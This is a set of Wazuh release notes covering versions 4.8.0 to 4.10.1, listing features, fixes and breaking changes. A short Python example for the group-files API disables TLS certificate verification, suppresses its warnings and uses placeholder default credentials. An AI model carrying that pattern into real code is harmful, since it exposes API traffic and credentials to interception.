The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.1 Release notes - 16 January 2025

This section lists the changes in version 4.10.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh dashboard
  • #7233 Added comma separators to numbers.

  • #7226 Moved the ability to manage the visibility of fields in Events and Vulnerability Detection > Inventory tables from the Columns button to a new Available fields button, enhancing the performance of the view.

  • #7226 Changed the color of the Export formatted button in data grid tables to match the color of the rest of the table buttons.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #27502 Handled HTTP 413 response code in the Indexer connector.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.0 Release notes - 9 January 2025

This section lists the changes in version 4.10.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release delivers key improvements across several areas, including enhanced debugging, expanded integration capabilities, standardized logging, refined compliance checks, and an improved dashboard user experience.

Key features include the following:

  • Wazuh debug symbols generation: Debug symbols are now generated during builds for macOS, Linux, and Windows, with crash dump generation by default in installers. Adequate documentation is provided for users to disable the crash dump generation process.

  • Standardized logging for cloud integrations: A logger has been introduced to standardize logs for cloud integration modules, improving log management and consistency.

  • Microsoft Intune integration: Integration with Microsoft Intune allows Wazuh to retrieve audit logs from managed devices, process them using built-in decoders and rules, and generate actionable security alerts.

  • Vulnerability evaluation status: A new field has been introduced to indicate whether a vulnerability is under evaluation or disputed, assisting users in tracking vulnerabilities still awaiting analysis in the National Vulnerability Database (NVD).

  • Wazuh Dashboard UI improvements: Several key sections of the Wazuh dashboard have been redesigned to improve the user experience. Changes include updates to the Overview, Events, and Agent detail pages, along with the addition of an Agents management menu. Additionally, there are redesigns of the deploy new agent page, adjustments to the loading logo size, and fixes to the vulnerability inventory table for improved usability.

  • Reworked SCA policies: Numerous SCA policies have been reworked, including policies for Rocky Linux 8, Alma Linux 8, Amazon Linux 2023, Windows Server 2019, RedHat 9, Windows Server 2012 R2, Windows Server 2012 (non-R2), Debian 10, Ubuntu 18, Amazon Linux 2, SUSE 15, macOS Ventura, and Windows 11 Enterprise.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #24333 Added self-recovery mechanism for rocksDB databases.

  • #25189 Improved logging for the indexer connector monitoring class.

  • #23760 Added generation of debug symbols.

  • #27320 Improved Vulnerability Scanner performance by optimizing the PEP440 version matcher.

  • #27324 Improved Vulnerability Scanner performance by optimizing version matcher object creation.

  • #27321 Improved Vulnerability Scanner performance by optimizing global data handling.

Wazuh agent
  • #23760 Added generation of debug symbols.

  • #23998 Changed how the AWS module handles non-existent regions.

  • #2006 Changed macOS packages building tool.

  • #7498 Enhanced Wazuh macOS agent installation instructions.

  • #2826 Enhanced Windows agent signing procedure.

  • #23466 Enhanced security by implementing a mechanism to prevent unauthorized uninstallation of the Wazuh agent on Linux endpoints.

  • #24498 Enhanced integration with Microsoft Intune MDM to pull audit logs for security alert generation.

  • #26137 Updated rootcheck old signatures.

RESTful API
  • #24621 Created new endpoint for agent uninstall process.

Ruleset
  • #21794 Created SCA policy for Microsoft Windows Server 2012 (non-R2).

  • #21434 Reworked SCA policy for Microsoft Windows Server 2019.

  • #24667 Reworked SCA policy for Red Hat Enterprise Linux 9.

  • #24991 Reworked SCA policy for Microsoft Windows Server 2012 R2.

  • #24957 Reworked SCA policy for Ubuntu 18.04 LTS and fixed incorrect checks in Ubuntu 22.04 LTS.

  • #24969 Reworked SCA policy for Amazon Linux 2.

  • #24975 Reworked SCA policy for SUSE Linux Enterprise 15.

  • #24992 Reworked SCA policy for Apple macOS 13.0 Ventura.

  • #25710 Reworked SCA policy for Microsoft Windows 11 Enterprise.

Other
  • #25374 Updated the embedded Python version up to 3.10.15.

  • #25324 Upgraded certifi and removed unused packages.

  • #25893 Upgraded external cryptography library dependency version to 43.0.1.

  • #26252 Upgraded external starlette and uvicorn dependencies.

Wazuh dashboard
  • #6964 Added sample data for YARA.

  • #6963 Updated malware detection group values in data sources.

  • #6938 Changed the registration ID of the Settings application for compatibility with OpenSearch Dashboards 2.16.0.

  • #6964 Changed Malware detection dashboard visualizations.

  • #6945 Removed agent RBAC filters from dashboard queries.

  • #7001 Removed GET /elastic/statistics API endpoint.

  • #6968 Added a custom filter and visualization for vulnerability.under_evaluation field. #7044 #7046

  • #7032 Changed MITRE ATT&CK overview description.

  • #7041 Changed the agents summary in overview with no results to an agent deployment help message.

  • #7036 Changed malware feature description.

  • #7033 Changed the font size of the KPI subtitles and the features descriptions.

  • #7059 Changed the initial width of the default columns for each selected field.

  • #7038 Removed VirusTotal application in favor of Malware Detection.

  • #7058 Added a vulnerabilities card to the agent details page.

  • #7112 Added an Agents management menu and moved the Endpoint Groups and Endpoint Summary sections into it; Endpoint Summary was renamed to Summary.

  • #7119 Added ability to filter from File Integrity Monitoring registry inventory.

  • #7119 Added new field columns and ability to select the visible fields in the File Integrity Monitoring Files and Registry tables.

  • #7081 Added filter by value to document details fields.

  • #7135 Added the pinned agent mechanism to inventory data, stats, and configuration for consistent functionality.

  • #7057 Changed the warning icon in events view to an info icon.

  • #7034 Changed feature container margins to ensure consistent separation and uniform design.

  • #7089 Changed inventory, stats and configuration page to use tabs.

  • #7156 Added ability to edit the wazuh.updates.disabled configuration setting from the UI.

  • #7149 Changed styles in the register agent view for consistency of styles across views.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #24620 Added support for multiple Certificate Authorities files in the indexer connector.

  • #24529 Removed hardcoded cipher text size from the RSA decryption method.

  • #25094 Avoided infinite loop while updating the vulnerability detector content.

  • #26223 Fixed repeated OS vulnerability reports.

  • #25479 Fixed inconsistencies between reported context and vulnerability data.

  • #26073 Fixed concurrency issues in LRU caches.

  • #26232 Removed all CVEs related to a deleted agent from the indexer.

  • #26922 Prevented an infinite loop when indexing events in the Vulnerability Detector.

  • #26842 Fixed segmentation fault in DescriptionsHelper::vulnerabilityDescription.

  • #24034 Fixed vulnerability scanner re-scan triggers in cluster environment.

  • #23266 Updated CURL version to 8.10.0.

  • #27145 Fixed an issue where elements in the delayed list were not purged when changing nodes.

  • #27145 Added logic to avoid re-scanning disconnected agents.

Wazuh agent
  • #25452 Fixed macOS agent upgrade timeout.

  • #24531 Fixed macOS agent startup error by properly redirecting cat command errors in wazuh-control.

  • #24516 Fixed inconsistent package inventory size information in Syscollector across operating systems.

  • #24125 Fixed missing Python path locations for macOS in Data Provider.

  • #25429 Fixed permission error on Windows 11 agents after remote upgrade.

  • #24387 Fixed increase of the variable containing file size in FIM for Windows.

  • #25699 Fixed timeout issue when upgrading Windows agent via WPK.

  • #26748 Allowed unknown syslog identifiers in Logcollector's journald reader.

  • #26828 Prevented agent termination during package upgrades in containers by removing redundant kill commands.

  • #26861 Fixed handle leak in FIM's realtime mode on Windows.

  • #26900 Fixed errors on AIX 7.2 by adapting the blibpath variable.

  • #26944 Sanitized agent paths to prevent issues with parent folder references.

  • #26633 Fixed an issue in the DEB package that prevented the agent from restarting after an upgrade.

  • #26944 Improved file path handling in agent communications to avoid references to parent folders.

  • #27054 Set RPM package vendor to UNKNOWN_VALUE when the value is missing.

  • #27059 Updated Solaris package generation to use the correct wazuh-packages reference.

Ruleset
  • #22597 Fixed logical errors in Windows Server 2022 SCA checks.

  • #25224 Fixed incorrect regulatory compliance in several Windows rules.

  • #24733 Fixed incorrect checks in Ubuntu 22.04 LTS.

  • #25190 Removed a check with high CPU utilization in multiple SCA policies.

Wazuh dashboard
  • #7001 Fixed issue where read-only users could not access the Statistics application.

  • #7047 Fixed the filter being displayed cropped on screens of 575px to 767px in the vulnerability detection module.

  • #7029 Fixed no-agent alert appearing with a selected agent in the agent-welcome view.

  • #7042 Fixed security policy exception when it contained deprecated actions.

  • #7048 Fixed export of formatted CSV data with special characters from tables.

  • #7077 Fixed filter management to prevent hiding when adding multiple filters.

  • #7120 Fixed loading state of the agents status chart in the home overview.

  • #7075 Fixed border on cells in events that disappear when clicked.

  • #7116 Fixed the MITRE ATT&CK exception in the agent view, the redirections of the ID, Tactics, Dashboard icon, and Event icon in the drop-down menu, and the card not displaying information when the flyout was opened.

  • #7119 Fixed ability to filter from files inventory details flyout of File Integrity Monitoring.

  • #7122 Removed processes state column in macOS agents.

  • #7160 Fixed invalid date filter applied on FIM details flyout.

  • #7156 Fixed the Check updates UI being displayed despite being configured as disabled.

  • #7151 Fixed filter by value in document details not working in Safari.

  • #7167 Fixed error message to prevent passing non-string values to the Wazuh logger.

  • #7177 Fixed the rendering of the data.vulnerability.reference field in the table and flyout.

  • #7072 Fixed column reordering feature.

  • #7161 Fixed endpoint group module name and indexer management order.

  • #440 Fixed incorrect or empty Wazuh API version displayed after upgrade.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.9.2 Release notes - 4 November 2024

This section lists the changes in version 4.9.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #26453 Fixed an unhandled exception during IPC event parsing.

Wazuh dashboard
  • #7128 Fixed vulnerabilities inventory table scroll.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.9.1 Release notes - 17 October 2024

This section lists the changes in version 4.9.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #24110 Improved provisioning method for wazuh-keystore to enhance security.

Wazuh agent
  • #25652 Added support for macOS 15 "Sequoia" in Wazuh Agent.

RESTful API
  • #26103 Changed the error status code thrown when basic services are down to 500.

Wazuh dashboard
  • #6977 Added feature to filter by field in the events table rows.

  • #6981 Changed the text of the query limit tooltip.

  • #6919 Upgraded the axios dependency to 1.7.4.

  • #6954 Improved MITRE ATT&CK intelligence flyout details readability.

  • #6984 Upgraded Event-tab column selector to show picked columns first.

  • #6960 Changed vulnerabilities.reference to links in Vulnerability Detection > Inventory columns.

  • #6982 Upgraded the follow-redirects dependency to 1.15.6.

  • #6956 Changed several loading spinners in some views to a loading search progress indicator.

  • #6999 Removed the XML autoformat function group configuration due to performance issues.

  • #7023 Removed the PDF report footer year.

  • #7086 Removed data grid tables from Threat Hunting dashboard, GitHub panel, and Office365 panel.

Packages
  • #3111 Added offline installation assistant import for the downloaded GPG Wazuh key.

  • #3098 Changed version to tag reference in source_branch references.

  • #3118 Changed Filebeat passwords only when installing Wazuh Server or changing passwords.

  • #3119 Updated SECURITY.md format.

  • #3121 Added stage parameter in bump_version script.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #24909 Fixed vulnerability detector issue where RPM upgrade wouldn't download new content.

  • #25667 Fixed uncaught exception at Keystore test tool.

  • #25705 Replaced eval calls with ast.literal_eval.

  • #26277 Fixed the cluster being disabled by default when loading configurations.

  • #25945 Added support for ARM packages for wazuh-manager.

Wazuh agent
  • #24910 Fixed agent crash on Windows version 4.8.0.

  • #25209 Fixed data race conditions at FIM's run_check.

  • #24376 Fixed Windows agent crashes related to syscollector.dll.

  • #25445 Fixed errors related to the libatomic.a library on AIX 7.X.

  • #24932 Fixed errors in Windows Agent where EvtFormatMessage returned errors 15027 and 15033.

  • #25459 Fixed FIM issue where it couldn't fetch group entries longer than 1024 bytes.

  • #25469 Fixed Wazuh Agent crash at syscollector.

  • #23528 Fixed a bug in the processed dates in the AWS module related to the AWS Config type.

  • #24694 Fixed an error in Custom Logs Buckets when parsing a CSV file that exceeds a certain size.

  • #26108 Fixed macOS syslog and ULS not configured out-of-the-box.

RESTful API
  • #25764 Fixed requests logging to obtain the hash_auth_context from JWT tokens.

  • #25216 Enabled API to listen to both IPv4 and IPv6 stacks.

Wazuh dashboard
  • #6933 Fixed issue causing vulnerability dashboard to fail loading for read-only users.

  • #6905 Fixed the temporal directory variable in the command to deploy a new Windows agent.

  • #6906 Fixed an error in the command to deploy a new macOS agent that could cause the registration password to have a wrong value due to a \n inclusion.

  • #6901 Fixed rendering of an active response as disabled when it is active.

  • #6908 Fixed an error in Dev Tools when using payload properties as arrays.

  • #6987 Fixed font size in tables used in the events tab, the Threat hunting dashboard tab, and the Vulnerabilities inventory tab.

  • #6983 Fixed missing link to Vulnerabilities detection and Office 365 in the agent menu of Endpoints Summary.

  • #6983 Fixed missing options depending on agent operating system in the agent configuration report.

  • #6989 Fixed a style issue that affected the Discover plugin.

  • #6995 Fixed a problem updating the API host registry in the GET /api/check-stored-api.

  • #7019 Fixed the Open report button on the toast and the Download report icon in the reporting table in Safari.

  • #7015 Fixed style issue when unpinning an agent in the endpoint summary section.

  • #7021 Fixed overflow style on a long value filter.

  • #7056 Fixed buttons enabled for a read-only user in Endpoint groups section.

  • #7090 Fixed the automatic page refresh in dashboards and prevented duplicate requests.

Packages
  • #3110 Fixed bug when changing the Filebeat URL in the Installation Assistant.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.9.0 Release notes - 5 September 2024

This section lists the changes in version 4.9.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release introduces several significant updates aimed at enhancing functionality, compatibility, and user experience. Key updates include support for journald logs in Logcollector, improved compatibility with OpenSearch 2.13.0, and integration with AWS Security Hub. Additionally, there are improvements to WPK packages and enhancements in the Wazuh-API with Connexion 3.0 and Uvicorn support. The release also addresses numerous bugs, further stabilizing the platform and improving overall performance.

  • Journald support in Logcollector: Systemd's journald logging is now supported, enabling Logcollector to monitor these logs, which can provide valuable information for users.

  • Integrate Wazuh with AWS Security Hub: Wazuh now integrates with AWS Security Hub, enabling users to manage security and assess compliance with best practices directly within AWS.

  • Improve WPKs: The WPK packages' logic has been streamlined, reducing complexity, especially in the backup/rollback process, and ensuring smoother updates.

  • Refactoring and redesign Endpoints Summary charts: The Endpoints Summary charts have been refactored and redesigned for improved clarity and usability.

  • New or updated SCA policies: Added support for Oracle Linux 9, Alma Linux 9, and Rocky Linux 9, and updated policies for RedHat 7, CentOS 7, RedHat 8, and CentOS 8.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #17306 Added alert forwarding to Fluentd.

  • #20285 Changed logging level of wazuh-db recv() messages from error to debug.

  • #16666 Fixed malformed JSON error in wazuh-analysisd.

  • #23727 Added missing functionality for vulnerability scanner translations.

  • #23722 Improved performance for vulnerability scanner translations.

  • #24536 Enhanced vulnerability scanner logging to be more expressive.

  • #23513 Added the HAProxy helper to manage load balancer configuration and automatically balance agents.

  • #23222 Added a validation to avoid killing processes from external services.

  • #23996 Enabled certificates validation in the requests to the HAProxy helper using the default CA bundle.

  • #21195 Sanitized the integrations directory code.

Wazuh agent
  • #19753 Removed the directory /boot from the default FIM settings for AIX.

  • #21690 Improved debugging logs for Windows registry monitoring configuration. Now the Wrong registry value type warnings include the registry path to help troubleshooting. Thanks to Zafer Balkan (@zbalkan).

  • #21287 Added Amazon Linux 1 and Amazon Linux 2023 support for the Wazuh installation assistant.

  • #23137 Added Journald support in Logcollector.

  • #20727 Fixed Windows Agent 4.8.0 permission errors on Windows 11 after upgrade.

  • #22440 Fixed Syscollector not checking if there's a scan in progress before starting a new one.

  • #16487 Fixed alert generation when the syscheck diff DB is full.

  • #2195 Fixed Wazuh deb uninstallation to remove non-config files.

  • #23273 Fixed improper Windows agent ACL on non-default installation directory.

  • #17664 Fixed the display of an agent's socket configuration.

  • #18494 Fixed wazuh-modulesd printing a child process not found error.

  • #23848 Fixed issue with an agent starting automatically without reason.

  • #17415 Fixed GET /syscheck to properly report size for files larger than 2GB.

  • #23203 Added support for Amazon Security Hub via AWS SQS.

  • #20624 Refactored and modularized the Azure integration code.

  • #23790 Improved logging of errors in Azure and AWS modules.

  • #22583 Dropped support for Python 3.7 in cloud integrations.

RESTful API
  • #23199 Replaced aiohttp server with uvicorn.

  • #23199 Changed the PUT /groups/{group_id}/configuration endpoint response error code when uploading an empty file.

  • #23199 Changed the GET, PUT and DELETE /lists/files/{filename} endpoints response status code when an invalid file is used.

  • #23199 Changed the PUT /manager/configuration endpoint response status code when uploading a file with invalid content-type.

  • #23094 Added support in the Wazuh API to parse journald configurations from the ossec.conf file.

  • #24360 Added user-agent to the CTI service request.

  • #21653 Merged group files endpoints (GET /groups/{group_id}/files/{filename}) into one that uses the raw parameter to receive plain text data (see the sketch after this list).

  • #22388 Removed the hardcoded fields returned by the GET /agents/outdated endpoint and added the select parameter to the specification.

  • #22423 Updated the regex used to validate CDB lists.

  • #22413 Changed the default value for empty fields in the GET /agents/stats/distinct endpoint response.

  • #22380 Changed the Wazuh API endpoint responses when receiving the Expect header.

  • #22745 Enhanced Authorization header values decoding errors to avoid showing the stack trace and fail gracefully.

  • #22908 Updated the format of the fields that can be N/A in the API specification.

  • #22954 Updated the Wazuh API specification to conform with the current endpoint requests and responses.

  • #22416 Removed the cache configuration option from the Wazuh API.

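As a usage illustration for the merged group files endpoint referenced in item #21653 above, the sketch below requests a group file first as structured JSON and then as plain text via the raw parameter. The group name default and the file agent.conf are example values, the connection details are placeholders, and the response is printed as-is rather than assuming a particular schema.

  import requests
  import urllib3

  WAZUH_API = "https://localhost:55000"   # placeholder host and port
  USER, PASSWORD = "wazuh", "wazuh"       # placeholder credentials

  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

  # Standard Wazuh API authentication: exchange basic credentials for a JWT.
  token = requests.post(
      f"{WAZUH_API}/security/user/authenticate",
      auth=(USER, PASSWORD),
      verify=False,
  ).json()["data"]["token"]
  headers = {"Authorization": f"Bearer {token}"}

  # Example values: the "default" group and its agent.conf file.
  url = f"{WAZUH_API}/groups/default/files/agent.conf"

  # Default behavior: structured (JSON) response.
  print(requests.get(url, headers=headers, verify=False).json())

  # With raw=true, the same endpoint returns the file contents as plain text.
  print(requests.get(url, params={"raw": "true"}, headers=headers, verify=False).text)
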
Ruleset
  • #19754 Clarified the description for rule ID 23502 about solved vulnerabilities.

  • #17784 Added new SCA policy for Rocky Linux 8.

Other
  • #20778 Upgraded external OpenSSL library dependency version used by Wazuh from V1 to V3.

  • #22680 Upgraded external connexion library dependency version to 3.0.5 and its related interdependencies.

Wazuh dashboard
  • #6145 Added AngularJS dependencies.

  • #6580 Migrated from AngularJS to ReactJS. #6555 #6618 #6613 #6631 #6594 #6893

  • #6120 Removed legacy embedded discover component.

  • #6268 Refactored the Endpoints Summary charts.

  • #6250 Added agent groups edition to Endpoints Summary. #6274

  • #6476 Added a filter to select outdated agents and the Upgrade agent action to Endpoints Summary. #6501 #6529 #6648

  • #6337 Changed the way the configuration is managed in the backend side. #6573

  • #6337 Moved the content of the API is down and Check connection views to the Server APIs view.

  • #6545 Added macOS log collection tab.

  • #6481 Removed the GET /api/timestamp API endpoint.

  • #6481 Removed the PUT /api/update-hostname/{id} API endpoint.

  • #6481 Removed the DELETE /hosts/remove-orphan-entries API endpoint.

  • #6573 Enhanced the validation for enrollment.dns on App Settings application.

  • #6607 Implemented the option to control configuration editing via API endpoints and UI.

  • #6572 Added the Journald log collector tab.

  • #6482 Implemented new data source feature on MITRE ATT&CK module.

  • #6653 Added HAProxy helper settings to cluster configuration.

  • #6660 Changed log collector socket configuration response property.

  • #6558 Added the ability to open the report file and the reporting application from toast message.

  • #6558 Added Office 365 support for agents.

  • #6716 Refactored the search bar to handle fixed and user-added filters correctly. #6755

  • #6714 Replaced the custom EuiSuggestItem component with the native component from OpenSearch UI.

  • #6800 Added pinned agent data validation when rendering the Inventory data, Stats, and Configuration tabs in Agent preview of Endpoints Summary.

  • #6534 Improved the filter management system by implementing new standard modules. #6772 #6873

  • #6745 Added the ability to generate URLs with predefined filters.

  • #6782 Removed unused API endpoints from creation of old visualizations: GET /elastic/visualizations/{tab}/{pattern}.

  • #6839 Changed permalink field in the Events tab table in VirusTotal to show an external link.

  • #6890 Changed the internal control from Endpoint Groups to a control via URL.

  • #6882 Changed the internal control from MITRE ATT&CK > Intelligence > Table to a control via URL.

  • #6886 Changed the display of rule details flyout to be based on URL.

  • #6161 Changed the logging system to use the one provided by the platform.

  • #6161 Removed logs.level setting.

  • #6161 Removed the usage of wazuhapp-plain.log, wazuhapp.log, wazuh-ui-plain.log, and wazuh-ui.log files.

  • #6161 Removed the App logs application.

  • #6161 Removed API endpoint GET /utils/logs/ui.

  • #6161 Removed API endpoint GET /utils/logs.

  • #6848 Added wz-link component to handle redirections.

  • #6902 Removed embedded dom-to-image dependency.

  • #6902 Added embedded and customized dom-to-image-more dependency.

  • #6949 Changed the order of columns in Vulnerabilities Detection > Events table.

Packages
  • #2989 Updated the Password Tool to add the default user and password to filebeat.yml when changing passwords.

  • #2991 Allowed installation on any OS.

  • #2970 Added support for Rocky Linux 9.4 in the Installation Assistant.

  • #2944 Updated the API script file name.

  • #2698 Added new Azure module files.

  • #2945 Added support for Ubuntu 24.04 in the Installation Assistant.

  • #2922 Changed the log message shown when neither yum nor apt-get is found, adding clearer instructions on the next steps.

  • #2911 Added a Cert-tool log file and modified the common_logger function to write to files without root permission.

  • #2908 Added the bash dependency to the Wazuh agent RPM for AIX.

  • #2909 Prevented failed checks related to the dashboard and indexer.

  • #2900 Made the Installation Assistant language agnostic.

  • #2882 Added rollBack to several exit points.

  • #2753 Added support for Amazon Linux 1, 2, and 2023.

  • #2790 Added support for AL2023 in WIA.

  • #2300 Added SCA policy for Rocky Linux 8 in SPECS.

  • #3070 Removed migrated and unsupported code.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #20505 Fixed compilation issue for local installation.

  • #24375 Fixed a warning when uninstalling the Wazuh manager if the vulnerability detection feed is missing.

  • #24393 Ensured vulnerability detection scanner log messages end with a period.

Wazuh agent
  • #19146 Fixed command monitoring on Windows to support UTF-8 characters.

  • #21455 Fixed an error in Windows agents preventing whodata policies loading.

  • #21595 Fixed an unexpected error where the manager received messages with a reported size not corresponding to the bytes received.

  • #21729 Prevented backup failures during WPK upgrades. A dependency check for the tar package was added.

  • #22210 Fixed a crash of the agent due to a library incompatibility.

  • #21728 Fixed an error of the Osquery integration on Windows that prevented loading osquery.conf.

  • #22588 Fixed a crash in the agent Rootcheck component when using <ignore>.

  • #20425 Fixed the agent not deleting the wazuh-agent.state file in Windows when stopped.

  • #24412 Fixed error in packages generation for CentOS 7.

  • #22392 Fixed Azure auditLogs/signIns status parsing (thanks to @Jmnis for the contribution).

  • #22621 Fixed how the S3 object keys with special characters are handled in the Custom Logs Buckets integration.

RESTful API
  • #20507 Improved XML validation to match the Wazuh internal XML validator.

  • #22428 Fixed bug in GET /groups.

  • #24946 Fixed the GET /agents/outdated endpoint query.

Ruleset
  • #22178 Added parsing of the optional node= log heading field to Audit decoders.

Other
  • #19794 Fixed a buffer overflow hazard in HMAC internal library.

Wazuh dashboard
  • #6237 Fixed disappearing scripted fields when index pattern fields refreshed.

  • #6667 Fixed invalid IP address ranges and file hashes in sample alert scripts.

  • #6558 Fixed error of malformed table row in PDF report generation.

  • #6730 Fixed the validation of the maximum allowed time interval for cron jobs.

  • #6747 Fixed styles in small height viewports.

  • #6770 Fixed behavior in Configuration Assessment when changing API.

  • #6871 Fixed the maximum width of the clear session button in the ruleset test view.

  • #6876 Fixed the width of the last modified column of the table in Windows Registry.

  • #6880 Fixed redirection to FIM > Inventory > Files from FIM > Inventory > Windows Registry when switching to a non-Windows agent.

Packages
  • #3063 Fixed Kibana server change password.

  • #3074 Fixed bugs in the offline installation using the installation assistant.

  • #3082 Fixed bug when inserting Filebeat template.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.8.2 Release notes - 20 August 2024

This section lists the changes in version 4.8.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Manager
  • #25225 Added a fix for when remoted fails to read a message.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.8.1 Release notes - 18 July 2024

This section lists the changes in version 4.8.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Manager
  • #24357 Added dedicated RSA keys for keystore encryption.

RESTful API
  • #24173 Updated the GET /manager/version/check endpoint response to always include the uuid field.

Other
  • #24108 Upgraded external Jinja2 library dependency version to 3.1.4.

  • #23925 Upgraded external requests library dependency version to 2.32.2.

Packages
  • #3005 Added -A|--api option validation to the wazuh-passwords-tool.sh script for changing API user credentials.

Resolved issues

This release resolves known issues as the following:

Manager
  • #24308 Fixed a bug in upgrade_agent CLI where it occasionally hung without showing a response.

  • #24341 Fixed a bug in upgrade_agent CLI where it occasionally raised an unhandled exception.

  • #24509 Changed keystore cipher algorithm to remove the reuse of sslmanager.cert and sslmanager.key.

Agent
  • #23989 Fixed the macOS agent to retrieve correct CPU name.

Dashboard plugin
  • #6778 Removed the unnecessary delay body parameter on server API requests.

  • #6777 Fixed home KPI links with custom or index pattern where the title is different from the ID.

  • #6793 Fixed the colors related to vulnerability severity levels on the Vulnerability Detection dashboard.

  • #6827 Fixed pinned agent error in vulnerabilities events tab.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.8.0 Release notes - 12 June 2024

This section lists the changes in version 4.8.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release introduces a major refactor of the Vulnerability Detector module that increases coverage and improves reliability by using a centralized feed of curated vulnerabilities maintained by Wazuh. It introduces global queries for vulnerability detection information, allowing users to search through vulnerability detection data across all endpoints.

The Wazuh dashboard notifies users whenever there's a newer Wazuh version available and offers a revamped UX navigation experience by completely overhauling the menu layout.

To support the centralized vulnerability feed and update check services, Wazuh has developed a new platform aimed at integrating and distributing Cyber Threat Intelligence (CTI) data.

Package inventory can now collect information from expanded sources, including the Snap package manager.

The release also addresses hundreds of bugs of varying impacts, further stabilizing the platform and improving the overall user experience.

  • Vulnerability Detector refactor: Vulnerability detection uses a centralized feed maintained by Wazuh and introduces global queries, significantly improving vulnerability detection capabilities and performance.

  • Update check service UI: Users can now be notified whenever there's a new Wazuh version available.

  • Wazuh dashboard UX redesign: A significant overhaul aimed at enhancing the user interface and experience, making navigation and operation more intuitive.

  • Snap packages support & PYPI and Node packages support: Wazuh now includes support for inventorying packages installed through the Snap package manager, improving visibility into software management.

Breaking changes
Manager
  • The Vulnerability Detection module no longer downloads external vulnerability feeds indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, and the National Vulnerability Database (NVD). Instead, the vulnerability detection capability now uses the new Wazuh CTI platform. wazuh #14153

  • The Vulnerability Detection module requires setting up communication with the Wazuh indexer. wazuh #14153

  • The Vulnerability Detector module has been renamed to Vulnerability Detection. The vulnerability-detector configuration option has been renamed to vulnerability-detection. wazuh #19781

Dashboard plugin
  • The Wazuh dashboard disabled_roles setting has been removed. Now, the Wazuh dashboard is visible to every Wazuh indexer role. wazuh-dashboard-plugins #5841

  • The Wazuh dashboard customization.logo.sidebar setting has been removed, and the sidebar logo is no longer customizable. wazuh-dashboard-plugins #5841

  • The extensions.* settings have been removed. Now, all Wazuh modules are visible in the main menu. wazuh-dashboard-plugins #5841

  • The default Wazuh dashboard home URL has changed from https://<WAZUH_DASHBOARD_URL>/app/wazuh to https://<WAZUH_DASHBOARD_URL>/app/wz-home. You can check the /etc/wazuh-dashboard/opensearch_dashboard.yml configuration file and replace the uiSettings.overrides.defaultRoute: /app/wazuh setting with uiSettings.overrides.defaultRoute: /app/wz-home if needed. An app not found error will appear if this value is incorrect. wazuh-packages #2497

What's new

This release includes new features or enhancements as the following:

Manager
  • #21201 Refactored vulnerability detection capability.

  • #18476 Improved wazuh-db detection of deleted database files.

  • #16893 Added timeout and retry parameters to the VirusTotal integration.

  • #18988 Extended wazuh-analysisd EPS metrics with events dropped by overload and remaining credits in the previous cycle.

  • #19819 Replaced Filebeat date index name processor to ensure the indices are identifiable by the index alias for auto-rollover.

  • #18466 Updated API and framework packages installation commands to use pip instead of direct invocation of setuptools.

  • #17015 Refactored how cluster status dates are treated in the cluster.

  • #21602 The log message about file rotation and signature from wazuh-monitord has been updated.

  • #21670 Implemented a dedicated keystore for indexer configuration to improve management of sensitive information.

  • #22774 Improved Wazuh-DB performance by adjusting SQLite synchronization policy.

  • #17750 Upgraded docker-compose V1 to V2 in API Integration test scripts.

Agent
  • #15740 Added snap package manager support to Syscollector.

  • #18574 Disabled host's IP query by Logcollector when ip_update_interval=0.

  • #17932 Added event size validation for the external integrations.

  • #17623 Refactored and modularized the AWS integration code.

  • #17623 Added new unit tests for the AWS integration.

  • #19064 Added multiple tenants support to the MS Graph integration module.

  • #16200 FIM now buffers the Linux audit events for who-data to prevent side effects in other components.

  • #19720 The sub-process execution implementation has been improved.

  • #20649 Added geolocation mapping for the AWS WAF events.

  • #21530 Added a validation to reject unsupported regions when using the inspector service.

  • #21561 Added additional information on some AWS integration errors.

  • #21791 Replaced the usage of fopen with wfopen to avoid processing invalid characters on Windows.

  • #21637 Fixed the installation script to prevent the macOS agent from starting automatically after installation.

RESTful API
  • #19952 Added new GET /manager/version/check API endpoint to obtain information about new releases of Wazuh (see the sketch after this list).

  • #20119 Removed PUT /vulnerability, GET /vulnerability/{agent_id}, GET /vulnerability/{agent_id}/last_scan and GET /vulnerability/{agent_id}/summary/{field} API endpoints as they were deprecated in version 4.7.0. Use the Wazuh indexer REST API instead.

  • #20420 Added the auto option to the ssl_protocol setting in the API configuration. This option enables automatic negotiation of the TLS certificate.

  • #21572 Removed the compilation_date field from GET /cluster/{node_id}/info and GET /manager/info endpoints.

  • #22387 Deprecated the cache configuration option.

  • #17048 Removed the custom parameter from the PUT /active-response endpoint.

  • #22727 Added API configuration option to protect the Wazuh indexer configuration from updates.

